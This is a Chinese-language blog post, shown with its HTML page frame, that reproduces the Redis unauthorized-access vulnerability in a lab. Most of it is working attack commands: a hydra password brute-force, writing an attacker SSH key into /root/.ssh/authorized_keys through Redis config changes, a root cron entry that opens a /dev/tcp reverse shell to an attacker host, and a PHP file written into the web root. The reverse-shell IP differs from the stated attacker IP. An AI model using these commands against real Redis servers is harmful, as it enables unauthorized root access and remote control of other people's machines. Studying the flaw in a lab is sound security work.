<!DOCTYPE html>
<html lang="zh">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"phyb0x.github.io","root":"/","scheme":"Mist","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="前言很早的洞了一直没仔细研究下(主要是看了几天审计太难受了)。">
<meta property="og:type" content="article">
<meta property="og:title" content="redis未授权访问">
<meta property="og:url" content="https://phyb0x.github.io/2018/10/22/redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/index.html">
<meta property="og:site_name" content="p&#39;Blog">
<meta property="og:description" content="前言很早的洞了一直没仔细研究下(主要是看了几天审计太难受了)。">
<meta property="og:locale">
<meta property="og:image" content="https://i.imgur.com/myJA0j9.png">
<meta property="og:image" content="https://i.imgur.com/lLdFPFw.png">
<meta property="og:image" content="https://i.imgur.com/wcdU7jo.png">
<meta property="og:image" content="https://i.imgur.com/a4PMtBz.png">
<meta property="og:image" content="https://i.imgur.com/f1mBOVX.png">
<meta property="og:image" content="https://i.imgur.com/uquQR6t.png">
<meta property="og:image" content="https://i.imgur.com/9nEu6LP.png">
<meta property="article:published_time" content="2018-10-22T14:48:25.000Z">
<meta property="article:modified_time" content="2019-01-19T02:05:04.000Z">
<meta property="article:author" content="Yumi">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.imgur.com/myJA0j9.png">

<link rel="canonical" href="https://phyb0x.github.io/2018/10/22/redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh'
  };
</script>

  <title>redis未授权访问 | p'Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">p'Blog</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>About</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh">
    <link itemprop="mainEntityOfPage" href="https://phyb0x.github.io/2018/10/22/redis%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/choumei.png">
      <meta itemprop="name" content="Yumi">
      <meta itemprop="description" content="Yumi">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="p'Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          redis未授权访问
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2018-10-22 22:48:25" itemprop="dateCreated datePublished" datetime="2018-10-22T22:48:25+08:00">2018-10-22</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2019-01-19 10:05:04" itemprop="dateModified" datetime="2019-01-19T10:05:04+08:00">2019-01-19</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/" itemprop="url" rel="index"><span itemprop="name">渗透测试</span></a>
                </span>
            </span>

          

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>很早的洞了一直没仔细研究下(主要是看了几天审计太难受了)。</p>
<span id="more"></span>

<h3 id="Redis"><a href="#Redis" class="headerlink" title="Redis"></a>Redis</h3><p>Redis是一个开源的高性能内存数据库也支持将内存数据保存在硬盘上，但是redis未强制访问权限，默认情况下会绑定在6379端口，没有进行采用相关策略与防火墙直接暴露在公网，没有设置密码认证可以免密登录服务造成未授权访问。</p>
<h3 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h3><p>攻击机ip: 192.168.184.145</p>
<p>靶机ip：192.168.184.139</p>
<p>这里也是有几种利用方式</p>
<h4 id="ssh写公钥"><a href="#ssh写公钥" class="headerlink" title="ssh写公钥"></a>ssh写公钥</h4><p>root权限的话我们就可以肆意妄为了，可以直接利用上传公钥ss免密登录。</p>
<p>首先我们先连接到redis，做最基本的一些信息收集，可以看到低版本还会暴露配置文件目录</p>
<p><img src="https://i.imgur.com/myJA0j9.png"></p>
<p><img src="https://i.imgur.com/lLdFPFw.png"><br>当然如果有密码的话我们先尝试爆破</p>
<pre><code>hydra -P passwd.txt redis://192.168.184.139
</code></pre>
<p>然后我们更改redis备份路径到ssh公钥存放路径 /root/.ssh</p>
<p>本地生成公私钥将公钥写入test.txt</p>
<pre><code>ssh-keygen -t rsa
(echo -e &quot;\n\n&quot;; cat id_rsa.pub; echo -e &quot;\n\n&quot;) &gt; test.txt
</code></pre>
<p><img src="https://i.imgur.com/wcdU7jo.png"></p>
<p>上传到靶机服务器</p>
<pre><code>cat test.txt | redis-cli -h 192.168.184.139 -x set crack
</code></pre>
<p>然后把redis备份路径更改为ssh公钥目录，重命名为authorized_keys</p>
<pre><code>config set dir /root/.ssh
config set dbfilename authorized_keys
</code></pre>
<p><img src="https://i.imgur.com/a4PMtBz.png"></p>
<p>可以看到我们的公钥已经传上去了<br><img src="https://i.imgur.com/f1mBOVX.png"><br>连接成功</p>
<h4 id="反弹shell"><a href="#反弹shell" class="headerlink" title="反弹shell"></a>反弹shell</h4><pre><code>set xxx &quot;\n\n*/1 * * * * /bin/bash -i&gt;&amp;/dev/tcp/192.168.194.145/444 0&gt;&amp;1\n\n&quot;
config set dir /var/spool/cron
config set dbfilename root
save
</code></pre>
<p><img src="https://i.imgur.com/uquQR6t.png"></p>
<h5 id="写webshell"><a href="#写webshell" class="headerlink" title="写webshell"></a>写webshell</h5><p>我们可以把写文件的目录改为web根路径，写入我们的webshell</p>
<pre><code>config set dir /var/www/html
set xxx &quot;\n\n\n&lt;?php phpinfo();?&gt;\n\n\n&quot;
config set dbfilename webshell.php
save
</code></pre>
<p><img src="https://i.imgur.com/9nEu6LP.png"></p>
<h3 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h3><p>复现也是踩了很多坑，我先是用的ununtuserver、centos去复现都会有权限问题，直接用root sudo启动默认也是redis权限，而且关掉redis保护线程后 kill -9 也kill不掉。还有就是用ubuntu复现还会有shell环境问题    <a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/news/301606">https://cloud.tencent.com/developer/news/301606</a>，还有就是写入的时候会有缓存，在set各种值的时候，这些值会混在一起导致攻击失效，比如我先尝试写公钥最后连接失败，再去进行反弹shell/写webshell，这个时候你set的木马或者反弹语句会与你写入的公钥混在一起，执行无效。</p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2018/10/09/seacms%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E5%88%86%E6%9E%90/" rel="prev" title="seacms命令执行分析">
      <i class="fa fa-chevron-left"></i> seacms命令执行分析
    </a></div>
      <div class="post-nav-item">
    <a href="/2018/10/23/linux%E6%9D%83%E9%99%90%E7%BB%B4%E6%8C%81-%E5%90%8E%E9%97%A8/" rel="next" title="linux权限维持-后门">
      linux权限维持-后门 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%89%8D%E8%A8%80"><span class="nav-number">1.</span> <span class="nav-text">前言</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Redis"><span class="nav-number">2.</span> <span class="nav-text">Redis</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.</span> <span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#ssh%E5%86%99%E5%85%AC%E9%92%A5"><span class="nav-number">3.1.</span> <span class="nav-text">ssh写公钥</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%8F%8D%E5%BC%B9shell"><span class="nav-number">3.2.</span> <span class="nav-text">反弹shell</span></a><ol class="nav-child"><li class="nav-item nav-level-5"><a class="nav-link" href="#%E5%86%99webshell"><span class="nav-number">3.2.1.</span> <span class="nav-text">写webshell</span></a></li></ol></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#%E6%80%BB%E7%BB%93"><span class="nav-number">4.</span> <span class="nav-text">总结</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="Yumi"
      src="/images/choumei.png">
  <p class="site-author-name" itemprop="name">Yumi</p>
  <div class="site-description" itemprop="description">Yumi</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">29</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
        <span class="site-state-item-count">6</span>
        <span class="site-state-item-name">categories</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Yumi</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://mist.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Mist</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/muse.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
